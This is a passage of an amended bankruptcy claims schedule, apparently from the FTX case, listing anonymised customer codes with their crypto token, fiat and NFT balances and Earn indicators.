| 07332783 | | CUSDT[1], DOGE[1], TRX[2], USD[0.83] | | |
| 07332785 | | CUSDT[1], DOGE[2968.51698606], USD[0.00] | | |
| 07332786 | | DOGE[2], TRX[4.79498792], USD[0.00] | | |
| 07332787 | | BTC[.0002218], CUSDT[2], DOGE[216.76863286], TRX[1], USD[69.93] | | |
| 07332788 | | USD[10.00] | | |
| 07332789 | | BAT[1], BRZ[1], CUSDT[1], DOGE[1], SHIB[1], TRX[3], USD[192.75] | | |
| 07332790 | | USD[0.00] | | |
| 07332791 | | BRZ[2], BTC[0.00104454], CUSDT[9], DOGE[257.27750935], SHIB[0], USD[0.00] | | |
| 07332792 | | BRZ[2], CUSDT[5], DOGE[4825.15490656], ETH[.03344471], ETHW[.03344471], TRX[2], USD[50.00], USDT[48.98243063] | | |
| 07332793 | | BRZ[1], CUSDT[4], DOGE[1], ETH[0], GRT[1], USD[0.00], USDT[0] | | |
| 07332794 | | DOGE[.00001372], SUSHI[.00879931], TRX[2], USD[0.00] | | |
| 07332795 | | USD[10.00] | | |
| 07332796 | | USD[10.00] | | |
| 07332797 | | USD[10.00] | | |
| 07332798 | | USD[10.00] | | |
| 07332799 | | DOGE[0], TRX[0], USD[0.00] | | |
| 07332800 | | USD[10.00] | | |
| 07332801 | | USD[10.00] | | |

Amended Schedule F/2 - Nonpriority Unsecured Customer Claims

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07332802 | | BRZ[49.89985427], CUSDT[3], DOGE[1], NFT (293433491875936971/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #29)[1], NFT (303856776789823891/Doak Walker's Playbook: SMU vs. Santa Clara - September 27, 1947 #35)[1], NFT (304895966665365070/Marcus Allen's Playbook: Los Angeles Raiders vs. Washington - January 22, 1984 #24)[1], NFT (306768620184346394/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 21, 1953 #32)[1], NFT (309164197549777298/Joe Theismann's Playbook: Notre Dame vs. USC - November 30, 1968 #20)[1], NFT (320280063967519226/Marcus Allen's Playbook: Kansas City Chiefs vs. Detriot Lions - November 29, 1996 #21)[1], NFT (338118970078251390/Joe Theismann's Playbook: New York Giants vs. Washington - October 20, 1974 #19)[1], NFT (353657145545683800/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #34)[1], NFT (354269114768363320/Joe Theismann's Playbook: Washington vs. Chicago Bears - September 29, 1985 #20)[1], NFT (365965689914143103/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #25)[1], NFT (366173006054251560/Tim Brown's Playbook: San Diego Chargers vs. Los Angeles Raiders - September 4, 1988 #23)[1], NFT (378073710323655465/Marcus Allen's Playbook: Seattle Seahawks vs. Los Angeles Raiders - October 7, 1984 #20)[1], NFT (388425496601168913/Tim Brown's Playbook: New York Jets vs. Oakland Raiders - December 2, 2002 #19)[1], NFT (414297992168234075/Joe Theismann's Playbook: Washington vs. Miami Dolphins - January 30, 1983 #20)[1], NFT (428705701891744264/Shannon Sharpe's Playbook: Baltimore Ravens vs. Denver Broncos - December 31, 2000 #26)[1], NFT (436954794155428293/Marcus Allen's Playbook: USC vs. Washington - November 14, 1981 #22)[1], NFT (450502795089377820/Shannon Sharpe's Playbook: Baltimore Ravens vs. Oakland Raiders - January 14, 2001 #24)[1], NFT (477446096831339346/Tim Brown's Playbook: Kansas City Chiefs vs. Oakland Raiders - December 9, 2001 #21)[1], NFT (480620533037970288/Tim Brown's Playbook: Michigan State vs. Notre Dame - September 19, 1987 #18)[1], NFT (483507364322429684/Shannon Sharpe's Playbook: Denver Broncos vs. Los Angeles Raiders - January 9, 1994 #24)[1], NFT (497614713998773457/Joe Theismann's Playbook: Washington vs. Chicago Bears - September 29, 1985 #21)[1], NFT (498516010464404880/Shannon Sharpe's Playbook: Kansas City Chiefs vs Denver Broncos - October 4, 1992 #24)[1], NFT (513251719654845526/Earl Campbell's Playbook: Rice vs. Texas - October 1st, 1977 #36)[1], NFT (542359678677258853/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #34)[1], NFT (548734377073628833/Doak Walker's Playbook: Detroit Lions vs. Cleveland Browns - December 28, 1952 #32)[1], SOL[.03216001], TRX[1], USD[0.00] | | |
| 07332804 | | DOGE[1], USD[0.01] | | |
| 07332805 | | CUSDT[8], TRX[3], USD[0.01] | | |
| 07332806 | | USD[10.00] | | |
| 07332807 | | USD[10.00] | | |
| 07332808 | | USD[10.78] | Yes | |
| 07332809 | | SOL[0.40416916], USD[0.00] | Yes | |
| 07332810 | | CUSDT[2.00001158], DOGE[0.00002259], SHIB[191481.06909864], TRX[0], USD[0.00] | Yes | |
| 07332811 | | CUSDT[10], USD[0.19] | Yes | |
| 07332812 | | NFT (445008585652884088/FTX - Off The Grid Miami #1307)[1], NFT (571151307709636164/Entrance Voucher #2114)[1], USD[0.00] | | |
| 07332813 | | BRZ[3], CUSDT[17], DOGE[6.1441986], SOL[.00902972], TRX[5], USD[4349.52] | Yes | |
| 07332814 | | USD[10.00] | | |
| 07332815 | | USD[0.00] | Yes | |
| 07332816 | | CUSDT[1], ETH[.00000001], ETHW[0], USD[0.00] | | |
| 07332817 | | USD[10.00] | | |
| 07332818 | | USD[10.00] | | |
| 07332819 | | USD[10.00] | | |
| 07332820 | | USD[10.00] | | |
| 07332821 | | USD[10.00] | | |
| 07332822 | | USD[10.00] | | |
| 07332824 | | USD[10.00] | | |
| 07332825 | | DOGE[1.00001351], TRX[1], USD[41.97] | | |
| 07332826 | | CUSDT[2], USD[10.00] | | |
| 07332827 | | BCH[.0079777], BRZ[3.06526431], BTC[.00034394], CUSDT[12], DOGE[48.37337722], ETH[.00075003], ETHW[.00074393], KSHIB[99.84956664], LTC[.0429557], SHIB[252491.84880302], SOL[.09394064], TRX[18.84070544], USD[0.08] | Yes | |
| 07332828 | | USD[20.00] | | |
| 07332829 | | USD[10.00] | | |
| 07332830 | | USD[10.00] | | |
| 07332831 | | BRZ[1], DOGE[2897.03327426], SHIB[1411885.50892054], USD[0.00] | | |
| 07332833 | | DOGE[1.01296546], USD[0.00] | | |
| 07332834 | | USD[10.00] | | |
| 07332835 | | USD[10.00] | | |
| 07332836 | | CUSDT[1], DOGE[500.24778188], TRX[155.2545249], USD[0.00] | | |
| 07332837 | | CUSDT[2], DOGE[49551.60373463], USD[11.08], USDT[1.10775193] | Yes | |
| 07332838 | | USD[10.00] | | |
| 07332839 | | USD[10.00] | | |
| 07332840 | | USD[10.00] | | |
| 07332841 | | BRZ[1], USD[0.00] | | |
| 07332842 | | USD[10.00] | | |
| 07332843 | | USD[10.00] | | |
| 07332845 | | USD[0.00] | | |
| 07332846 | | USD[10.00] | | |
| 07332847 | | USD[0.01] | | |
| 07332848 | | DOGE[1], GRT[397.70941183], USD[0.00] | Yes | |
| 07332849 | | USD[10.00] | | |
| 07332850 | | CUSDT[1], DOGE[1], USD[0.00], USDT[0] | Yes | |
| 07332851 | | DOGE[2232.95688068], GRT[25.17718012], USD[4.55] | | |
| 07332852 | | DOGE[38.77337782], USD[0.00] | | |
| 07332853 | | BAT[1.01188664], BRZ[1], BTC[0], CUSDT[4], ETH[0], ETHW[0.20337383], GRT[1], SHIB[4], TRX[10], USD[0.00], USDT[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07332854 | | DOGE[1], TRX[2], USD[0.00] | Yes | |
| 07332855 | | CUSDT[1], DOGE[168.41379133], USD[0.00] | | |
| 07332856 | | BAT[1], USD[0.01] | | |
| 07332857 | | USD[10.00] | | |
| 07332858 | | DOGE[550.911602], USD[13.49] | Yes | |
| 07332859 | | BRZ[4], CUSDT[25], DOGE[344.66712882], ETH[1.11831345], ETHW[1.11831345], GRT[1], TRX[4], USD[0.00], USDT[2] | | |
| 07332860 | | BRZ[1], DOGE[.00004541], TRX[2], USD[0.00], USDT[1] | | |
| 07332861 | | USD[10.00] | | |
| 07332862 | | USD[0.01] | | |
| 07332863 | | CUSDT[3], DOGE[.00087259], LINK[.00007792], TRX[100.99492487], USD[0.00] | | |
| 07332864 | | USD[10.00] | | |
| 07332865 | | USD[10.00] | | |
| 07332866 | | DOGE[.00007652], USD[0.00] | | |
| 07332867 | | SUSHI[.63721246], USD[0.00] | | |
| 07332868 | | BRZ[1], CUSDT[1], DOGE[.00000002], TRX[4], USD[493.72] | | |
| 07332869 | | USD[10.00] | | |
| 07332871 | | BRZ[2], CUSDT[4], DOGE[5.110425], GRT[511.58287226], USD[0.01], USDT[1.10178441] | Yes | |
| 07332872 | | BAT[2909.88784478], BF_POINT[100], BTC[.12664372], DOGE[21385.66771487], ETH[1.18139349], LTC[9.36350269], NFT[355690741428338348/Entrance Voucher #2773][1], SUSHI[395.68577556], USD[2744.40] | Yes | |
| 07332873 | | USD[10.00] | | |
| 07332874 | | USD[10.00] | | |
| 07332875 | Contingent, Disputed | USD[10.00] | | |
| 07332876 | | BRZ[1], CUSDT[1], DOGE[.19115847], SHIB[2], USD[0.01] | Yes | |
| 07332877 | | USD[10.00] | | |
| 07332879 | | DOGE[.00005907], USD[0.23] | | |
| 07332880 | | USD[10.00] | | |
| 07332881 | | USD[0.00] | | |
| 07332882 | | USD[0.00] | | |
| 07332883 | | TRX[189.41624895], USD[0.00] | Yes | |
| 07332884 | | USD[10.00] | | |
| 07332885 | | USD[10.00] | | |
| 07332886 | | USD[10.00] | | |
| 07332887 | | BRZ[1], CUSDT[3], DOGE[2.04851472], ETH[0], SHIB[2], SOL[.00000001], TRX[2.00006], USD[0.00], USDT[0.00000001] | Yes | |
| 07332888 | | CUSDT[2], TRX[1.22365922], USD[0.01] | | |
| 07332889 | | USD[10.00] | | |
| 07332890 | | USD[10.00] | | |
| 07332891 | | BRZ[2], CUSDT[3], DOGE[.00000988], ETH[.00055562], ETHW[.00055562], GRT[1], TRX[3], USD[10.54] | | |
| 07332892 | | USD[10.00] | | |
| 07332893 | | DOGE[130.2426301], USD[10.16] | | |
| 07332894 | | BRZ[2], BTC[.00000663], CUSDT[2], GRT[.00006123], SUSHI[.00014729], TRX[5], USD[0.07] | | |
| 07332895 | | USD[10.00] | | |
| 07332896 | | USD[10.00] | | |
| 07332897 | | USD[10.00] | | |
| 07332898 | | USD[10.00] | | |
| 07332899 | | USD[10.00] | | |
| 07332900 | | USD[10.00] | | |
| 07332901 | | BRZ[1], CUSDT[22], DOGE[5975.76042748], TRX[1], USD[0.00] | Yes | |
| 07332902 | | USD[10.00] | | |
| 07332903 | | USD[10.00] | | |
| 07332904 | | DOGE[3619.26133237], USD[0.00] | Yes | |
| 07332905 | | SOL[.74981798], USD[0.00] | | |
| 07332906 | | BRZ[1], CUSDT[12], TRX[9], USD[0.39] | | |
| 07332907 | | USD[10.00] | | |
| 07332908 | | DOGE[13.51856361], USD[5.00] | | |
| 07332909 | | GRT[6.03281001], USD[0.00] | Yes | |
| 07332910 | | USD[10.00] | | |
| 07332911 | | USD[10.00] | | |
| 07332912 | | DOGE[1], USD[0.01] | | |
| 07332913 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07332914 | | USD[0.02] | | |
| 07332915 | | CUSDT[1], USD[0.00] | Yes | |
| 07332916 | | USD[10.00] | | |
| 07332917 | | DOGE[23.58661159], USD[0.00], USDT[0] | Yes | |
| 07332918 | | USD[10.00] | | |
| 07332919 | | USD[10.00] | | |
| 07332920 | | USD[10.00] | | |
| 07332921 | | DOGE[2.00002695], LTC[0], USD[0.00] | | |
| 07332922 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07332923 | | USD[0.01] | | |
| 07332924 | | CUSDT[2], DOGE[2123.8734678], GRT[1], TRX[1], USD[0.01] | Yes | |
| 07332925 | | USD[10.00] | | |
| 07332926 | | BRZ[1], TRX[2], USD[0.00] | | |
| 07332927 | | CUSDT[1], DOGE[37.52399098], USD[0.00] | | |
| 07332928 | | USD[10.00] | | |
| 07332929 | | USD[10.00] | | |
| 07332930 | | BTC[0], ETH[0], ETHW[0], SHIB[0], USD[0.00] | | |
| 07332931 | | DOGE[0.16412314], USD[0.00] | | |
| 07332932 | | CUSDT[5], DOGE[1], TRX[2], USD[0.00] | Yes | |
| 07332933 | | USD[10.00] | | |
| 07332934 | | USD[10.00] | | |
| 07332935 | | BRZ[1], CUSDT[2], DOGE[1.27748964], TRX[2], USD[0.00] | | |
| 07332936 | | DOGE[164.58675639], USD[10.00] | | |
| 07332937 | | CUSDT[1], DOGE[1], USD[0.03] | | |
| 07332938 | | USD[10.00] | | |
| 07332939 | | USD[10.00] | | |
| 07332940 | | TRX[0.46013349], USD[0.00] | Yes | |
| 07332941 | | DOGE[0], USD[0.00] | Yes | |
| 07332942 | | USD[10.00] | | |
| 07332943 | | DOGE[0.92300000], USD[0.00] | | |
| 07332944 | | BF_POINT[200], BTC[0], CUSDT[6], DOGE[1], TRX[1], USD[0.00], USDT[0.00037601] | | |
| 07332945 | | USD[10.00] | | |
| 07332946 | | USD[10.00] | | |
| 07332947 | | BRZ[0], BTC[0], DOGE[0], ETH[0], LINK[0], SUSHI[0], UNI[0], USD[0.01] | Yes | |
| 07332948 | | BTC[0], DOGE[0], ETH[0.06483011], ETHW[0], LTC[0], MATIC[0], SOL[0], USD[1.32] | Yes | |
| 07332949 | | USD[10.00] | | |
| 07332950 | | USD[10.00] | | |
| 07332951 | | DOGE[9.64316732], USD[0.05] | | |
| 07332952 | | BAT[39.98259583], BCH[.02102364], DOGE[1], USD[0.00] | Yes | |
| 07332953 | | BRZ[1], DOGE[1], USD[0.00] | | |
| 07332954 | | DOGE[5], USD[0.00] | | |
| 07332955 | | USD[10.00] | | |
| 07332956 | | USD[10.00] | | |
| 07332957 | | USD[10.00] | | |
| 07332958 | | BAT[19.8402297], BRZ[1], CUSDT[71.18226271], DOGE[35987.56658211], ETH[1.11724944], ETHW[1.11678024], EUR[0.65], GBP[1.16], GRT[.71555222], SOL[8.59466489], SUSHI[.14106858], TRX[107.66439294], USD[-1650.00], USDT[1.65885263] | Yes | |
| 07332959 | | BTC[0], DOGE[0], ETH[0], ETHW[0], LINK[0], SOL[0], TRX[1], USD[0.00], USDT[0] | | |
| 07332960 | | BRZ[1], CUSDT[2], DOGE[1], ETH[.16315423], ETHW[.16315423], TRX[1729.36064597], USD[13.04] | | |
| 07332961 | Contingent, Disputed | USD[0.00] | | |
| 07332962 | | USD[10.00] | | |
| 07332963 | | USD[10.00] | | |
| 07332964 | | USD[10.00] | | |
| 07332965 | | USD[0.00] | | |
| 07332966 | | BRZ[1], CUSDT[4], DOGE[0.04986859], TRX[2], USD[0.81] | | |
| 07332967 | | DOGE[344.32525544], USD[0.00] | Yes | |
| 07332968 | | SHIB[1], USD[0.02] | | |
| 07332969 | | USD[10.00] | | |
| 07332970 | | DOGE[31.39579717], USD[0.00] | | |
| 07332971 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07332972 | | USD[10.00] | | |
| 07332973 | | CUSDT[1.0000376], DOGE[0.00001220], PAXG[0.00001081], SHIB[1], TRX[.86], USD[0.00] | | |
| 07332974 | | DOGE[1.70415333], USD[0.03] | | |
| 07332975 | | USD[10.00] | | |
| 07332976 | | BCH[.48445791], BF_POINT[300], BTC[0.01890826], DOGE[24.35220156], ETH[.39012469], ETHW[.38996093], GRT[602.17460022], LTC[4.42781269], SOL[33.21468018], SUSHI[66.41510302], TRX[5348.02832317], UNI[22.15052595], USD[0.00] | Yes | |
| 07332977 | | USD[10.00] | | |
| 07332978 | | USD[10.00] | | |
| 07332979 | | BTC[0], ETH[0], ETHW[261.47019407], SUSHI[11397.93055], USD[7.72], USDT[0] | | |
| 07332980 | | DOGE[143.62304198], USD[0.00] | Yes | |
| 07332981 | | DOGE[28.25742799], USD[0.00] | | |
| 07332982 | | BRZ[0], BTC[0.00567409], CUSDT[0], DOGE[4476.34958242], LINK[0], SHIB[3759457.77993556], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07332983 | | USD[10.00] | | |
| 07332984 | | USD[0.01], USDT[0.00000001] | Yes | |
| 07332985 | | USD[10.00] | | |
| 07332986 | | USD[10.00] | | |
| 07332987 | | USD[10.00] | | |
| 07332988 | | BAT[1], BRZ[1], CUSDT[3], DOGE[.04808687], TRX[1], USD[0.00] | | |
| 07332989 | | BRZ[1], BTC[0], CUSDT[5], DOGE[0], TRX[3], USD[0.95] | | |
| 07332990 | | DOGE[.00009601], TRX[1], USD[0.01] | | |
| 07332991 | | ETH[0], USD[0.00], USDT[0] | | |
| 07332992 | | GRT[82.43517277], USD[0.00] | | |
| 07332993 | | DOGE[0], USD[0.00] | Yes | |
| 07332994 | | USD[10.00] | | |
| 07332995 | | USD[10.00] | | |
| 07332996 | | USD[10.00] | | |
| 07332997 | | DOGE[0], USD[0.00] | | |
| 07332998 | | USD[10.00] | | |
| 07332999 | | USD[10.00] | | |
| 07333002 | | USD[10.00] | | |
| 07333003 | | USD[10.00] | | |
| 07333004 | | NFT [295453071957554920/GSW Western Conference Finals Commemorative Banner #122][1], NFT [306540550726577243/GSW Western Conference Semifinals Commemorative Ticket #68][1], NFT [308248280289519186/GSW Western Conference Finals Commemorative Banner #128][1], NFT [308918777512761197/GSW Championship Commemorative Ring][1], NFT [313238262687446138/GSW Championship Commemorative Ring][1], NFT [326161780022803825/GSW Western Conference Semifinals Commemorative Ticket #69][1], NFT [327050651930078955/GSW Western Conference Semifinals Commemorative Ticket #67][1], NFT [331651769343628816/GSW 75 Anniversary Diamond #206 (Redeemed)][1], NFT [338724559191712878/GSW Western Conference Finals Commemorative Banner #124][1], NFT [344913592024707337/GSW Round 1 Commemorative Ticket #470][1], NFT [349286701289515974/GSW Western Conference Semifinals Commemorative Ticket #72][1], NFT [349996514237500214/GSW Round 1 Commemorative Ticket #30][1], NFT [376206984570059179/GSW Round 1 Commemorative Ticket #468][1], NFT [376316950355589231/GSW Western Conference Finals Commemorative Banner #132][1], NFT [378981652085575806/Imota Ticket Stub #762][1], NFT [382419520469470070/GSW Western Conference Finals Commemorative Banner #126][1], NFT [386686577520788328/GSW Championship Commemorative Ring][1], NFT [389930631656792660/GSW Western Conference Finals Commemorative Banner #127][1], NFT [393218654711440172/FTX - Off The Grid Miami #980][1], NFT [396127531123451376/GSW Championship Commemorative Ring][1], NFT [399670621243855816/GSW Western Conference Semifinals Commemorative Ticket #71][1], NFT [420043807745096156/GSW Western Conference Finals Commemorative Banner #129][1], NFT [420424916633115599/GSW Round 1 Commemorative Ticket #472][1], NFT [428863387967114593/GSW Western Conference Semifinals Commemorative Ticket #70][1], NFT [440195391511258017/GSW Western Conference Finals Commemorative Banner #123][1], NFT [440275497872206479/The Finale at Oracle Ticket #2 (Redeemed)][1], NFT [453268483859355799/GSW Western Conference Finals Commemorative Banner #125][1], NFT [473773350619780799/GSW Round 1 Commemorative Ticket #471][1], NFT [476022759279609980/GSW 75 Anniversary Diamond #310 (Redeemed)][1], NFT [488688680523453154/GSW Western Conference Finals Commemorative Banner #130][1], NFT [492471708211831045/GSW Round 1 Commemorative Ticket #469][1], NFT [500255585666931824/GSW Championship Commemorative Ring][1], NFT [517126723289981156/Warriors Logo Pin #39 (Redeemed)][1], NFT [518998807117493086/GSW Western Conference Finals Commemorative Banner #133][1], NFT [541544615197102724/GSW Western Conference Finals Commemorative Banner #131][1], NFT [570514823579235032/GSW Championship Commemorative Ring][1], NFT [571617892807701464/Warriors Foam Finger #567 (Redeemed)][1], NFT [572854982123409943/Warriors Hoop #89 (Redeemed)][1], USD[611.00] | | |
| 07333005 | | CUSDT[1], DOGE[408.16672005], TRX[1], USD[0.41] | | |
| 07333006 | | USD[10.00] | | |
| 07333007 | | DOGE[1], USD[0.00] | | |
| 07333008 | | USD[10.00] | | |
| 07333009 | | USD[10.00] | | |
| 07333011 | | CUSDT[1], DOGE[217.45348569], ETH[.10147949], ETHW[.10043691], TRX[1], USD[0.00] | Yes | |
| 07333012 | | USD[10.00] | | |
| 07333015 | | USD[0.00] | Yes | |
| 07333016 | | DOGE[18.38814385], USD[0.00] | | |
| 07333017 | | CUSDT[1], USD[0.00] | | |
| 07333018 | | USD[10.00] | | |
| 07333019 | | BRZ[1], CUSDT[5], USD[0.01] | | |
| 07333020 | | USD[10.00] | | |
| 07333021 | | AAVE[.04770536], CUSDT[4], USD[0.00] | | |
| 07333023 | | USD[10.00] | | |
| 07333024 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07333025 | | USD[10.00] | | |
| 07333026 | | BAT[1], DOGE[0], GRT[1], TRX[1], USD[0.00] | | |
| 07333027 | | DOGE[7301.16328868], ETH[0], ETHW[0], LTC[0], USD[602.25] | | |
| 07333028 | | DOGE[1.00000457], USD[0.01] | | |
| 07333029 | | DOGE[37928.86817278], USD[0.00] | Yes | |
| 07333030 | | USD[10.00] | | |
| 07333031 | | CUSDT[1], TRX[2], USD[0.00] | | |
| 07333032 | | CUSDT[2], USD[0.01] | | |
| 07333033 | | CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07333034 | | DOGE[0], ETH[0], SHIB[0], USD[0.24], USDT[0] | Yes | |
| 07333035 | | BAT[1], BRZ[2], BTC[0], CUSDT[4], DOGE[1], GRT[2], TRX[8], UNI[1], USD[0.00], USDT[0] | | |
| 07333036 | | DOGE[1], TRX[2], USD[0.02] | Yes | |
| 07333037 | | BRZ[1], CUSDT[21], DOGE[13594.86812605], SHIB[7898001.11013585], TRX[2], USD[0.32] | | |
| 07333038 | | USD[10.00] | | |
| 07333039 | | SHIB[2], USD[0.91] | | |
| 07333040 | | SOL[1.02933601], USD[0.00] | | |
| 07333041 | | BRZ[1], CUSDT[1], TRX[1], USD[0.00] | | |
| 07333042 | | USD[10.00] | | |
| 07333043 | | DOGE[0], ETH[0], SHIB[929087.17501362], USD[0.01], USDT[0] | | |
| 07333044 | | CUSDT[3], DOGE[1], TRX[1], USD[0.00], USDT[1.10905285] | Yes | |
| 07333045 | | DOGE[26.24883008], USD[0.00] | | |
| 07333046 | | DOGE[2998.02741882], TRX[1], USD[543.93] | Yes | |
| 07333047 | | USD[0.08] | | |
| 07333049 | | BRZ[1], CUSDT[4], DOGE[3620.36808857], ETH[.0146558], ETHW[.0146558], TRX[1], USD[0.00] | | |
| 07333050 | | TRX[211.76622619], USD[0.00] | Yes | |
| 07333051 | | USD[10.00] | | |
| 07333052 | | DOGE[133.68454938], USD[0.00] | | |
| 07333053 | | CUSDT[1.04748539], DOGE[.45039657], USD[0.01] | | |
| 07333054 | | USD[10.00] | | |
| 07333055 | | DOGE[2744.88244549], USD[60.00] | | |
| 07333056 | | CUSDT[2], USD[0.00] | | |
| 07333057 | | USD[10.00] | | |
| 07333058 | | USD[66.12] | Yes | |
| 07333059 | | BAT[0], BTC[0], DOGE[0], USD[0.00] | | |
| 07333060 | | DOGE[4], USD[0.00], USDT[0] | | |
| 07333061 | | BRZ[1], CUSDT[2.02582425], DOGE[1613.23706713], SHIB[16631958.7291792], TRX[1], USD[0.00] | Yes | |
| 07333062 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07333063 | | USD[10.00] | | |
| 07333064 | | USD[10.00] | | |
| 07333065 | | USD[10.00] | | |
| 07333066 | | CUSDT[5], TRX[1], USD[310.59] | | |
| 07333068 | | BRZ[1], DOGE[2987.80941635], SHIB[148323.93948383], USD[0.00] | | |
| 07333069 | | USD[0.01] | Yes | |
| 07333070 | | BTC[0.00003351], TRX[.924], USDT[0] | | |
| 07333071 | | USD[10.00] | | |
| 07333072 | | DOGE[0], USD[0.01] | | |
| 07333073 | | BAT[2], BRZ[2], CUSDT[10], DOGE[619.2007223], TRX[4], USD[0.00], USDT[1] | | |
| 07333075 | | CUSDT[3], USD[0.01] | | |
| 07333076 | | USD[10.00] | | |
| 07333077 | | BRZ[0], BTC[0], DOGE[272.46971864], ETH[0.00333738], ETHW[0.00333738], USD[0.00] | | |
| 07333078 | | ETH[0], SOL[0], USD[10.73], USDT[.00522575] | | |
| 07333079 | | USD[10.00] | | |
| 07333080 | | DOGE[1], ETH[.0000023], ETHW[.0000023], SHIB[156566.37528605], USD[0.00] | Yes | |
| 07333081 | | DOGE[0], SHIB[1241119.99680348], TRX[2], USD[0.00] | Yes | |
| 07333082 | | USD[10.00] | | |
| 07333084 | | BTC[.00001514], USD[0.00] | | |
| 07333086 | | LINK[1.05782529], USD[0.00] | | |
| 07333087 | | BRZ[1], BTC[.00003047], CUSDT[4], DOGE[657.66893562], ETH[.00076732], ETHW[.00076732], LTC[.00776103], SUSHI[.00000229], TRX[3], USD[0.22] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07333088 | | USD[10.00] | | |
| 07333089 | | USD[10.00] | | |
| 07333090 | | DOGE[34.0537519], USD[0.00] | Yes | |
| 07333091 | | BCH[0], BRZ[2], BTC[0.00127547], CUSDT[4], DOGE[397.12041204], ETH[0], ETHW[0], GRT[1], TRX[5], USD[0.00], USDT[0] | | |
| 07333092 | | CUSDT[4], ETH[.00000001], USD[0.01] | Yes | |
| 07333093 | | BRZ[0], CUSDT[1], DOGE[0.00818493], USD[0.00] | | |
| 07333094 | | USD[10.00] | | |
| 07333095 | | USD[0.00] | Yes | |
| 07333096 | | MATIC[1.42944281], USD[0.00], USDT[0.00000001] | Yes | |
| 07333097 | | BCH[.00045625], BRZ[0], ETH[0], USD[0.00] | | |
| 07333098 | | USD[10.00] | | |
| 07333100 | | DOGE[8], GRT[1], USD[0.00], USDT[0.00000001] | | |
| 07333101 | | BRZ[1], CUSDT[8], NFT (29259023308322635S/Untitled (Blessed) #2)[1], TRX[111.53514293], USD[0.00] | | |
| 07333102 | | USD[10.00] | | |
| 07333103 | | BTC[0.00000665], USD[0.00] | | |
| 07333104 | | USD[0.01] | | |
| 07333105 | | BRZ[0], BTC[0], DOGE[2.43944773], USD[0.00] | | |
| 07333106 | | USD[10.00] | | |
| 07333107 | | BRZ[1], USD[0.00], USDT[0] | Yes | |
| 07333108 | | BCH[.02321068], BTC[.00017758], CUSDT[2], DOGE[1258.70594068], SHIB[202.66087098], TRX[.92], USD[17.07] | Yes | |
| 07333109 | | USD[10.00] | | |
| 07333110 | | USD[10.00] | | |
| 07333111 | | BRZ[1], CUSDT[61.48060828], ETH[0.10867074], ETHW[0.10757473], SHIB[1], TRX[11.33347071], USD[64.02] | Yes | |
| 07333112 | | ETH[.00302281], ETHW[.00302281], USD[0.00] | | |
| 07333113 | | BAT[108.06139554], USD[0.00] | | |
| 07333115 | | BRZ[4], CUSDT[1], DOGE[.26781768], GRT[1], LINK[1], USD[0.01] | | |
| 07333116 | | CUSDT[1], DOGE[164.29282699], USD[0.00] | | |
| 07333117 | | CUSDT[1], DOGE[1], ETH[2.77420437], ETHW[2.77420437], USD[0.86] | | |
| 07333118 | | CUSDT[3], TRX[1], USD[0.94] | | |
| 07333119 | | DOGE[877.99835036], USD[0.00] | | |
| 07333120 | | USD[10.00] | | |
| 07333121 | | USD[0.00] | | |
| 07333122 | | BRZ[1], CUSDT[2], DOGE[0], ETH[0], USD[0.00] | | |
| 07333123 | | DOGE[1172.85359187], USD[0.00] | | |
| 07333124 | | BRZ[1], CUSDT[5], ETH[.15253171], ETHW[.15176165], SHIB[1520994.69193347], SOL[.69376076], TRX[2], USD[0.01] | Yes | |
| 07333125 | | DOGE[0], USD[0.00] | Yes | |
| 07333126 | | CUSDT[6], DOGE[41.20045519], TRX[2], USD[0.00] | | |
| 07333127 | | USD[10.00] | | |
| 07333128 | | BTC[.00629829], CUSDT[2], TRX[4], USD[0.01], USDT[1] | | |
| 07333129 | | BTC[0], DOGE[0.02186311], ETH[0], PAXG[0], USD[0.00] | | |
| 07333130 | | BAT[13.28530576], BRZ[2], BTC[.00020473], DOGE[665.64035308], GRT[14.933364], KSHIB[2767.38525933], SHIB[1157470.98671894], USD[0.00] | Yes | |
| 07333131 | | CUSDT[7], DOGE[796.7339747], TRX[1], USD[7.02] | | |
| 07333133 | | DOGE[196.81958332], USD[53.38] | Yes | |
| 07333134 | | BTC[.000001], CUSDT[5], ETH[.0000056], ETHW[.0000056], TRX[1], USD[0.00] | Yes | |
| 07333135 | | USD[10.83] | Yes | |
| 07333136 | | DOGE[105.89890424], USD[0.00] | | |
| 07333137 | | BAT[1], CUSDT[1], DOGE[32832.32521326], TRX[3242.88195164], USD[5.60], USDT[1] | | |
| 07333138 | | CUSDT[2], SHIB[176186.10620241], USD[0.00] | Yes | |
| 07333139 | | BTC[.00017589], USD[0.00] | | |
| 07333140 | | CUSDT[2], ETH[0.02436366], ETHW[0.02436366], LINK[0], USD[73.57] | | |
| 07333141 | | ETH[.00355314], ETHW[.00355314], USD[0.00] | | |
| 07333142 | | BTC[.00015023], CUSDT[2], DOGE[136.07599831], ETH[.00613651], ETHW[.00613651], TRX[1], USD[0.00] | | |
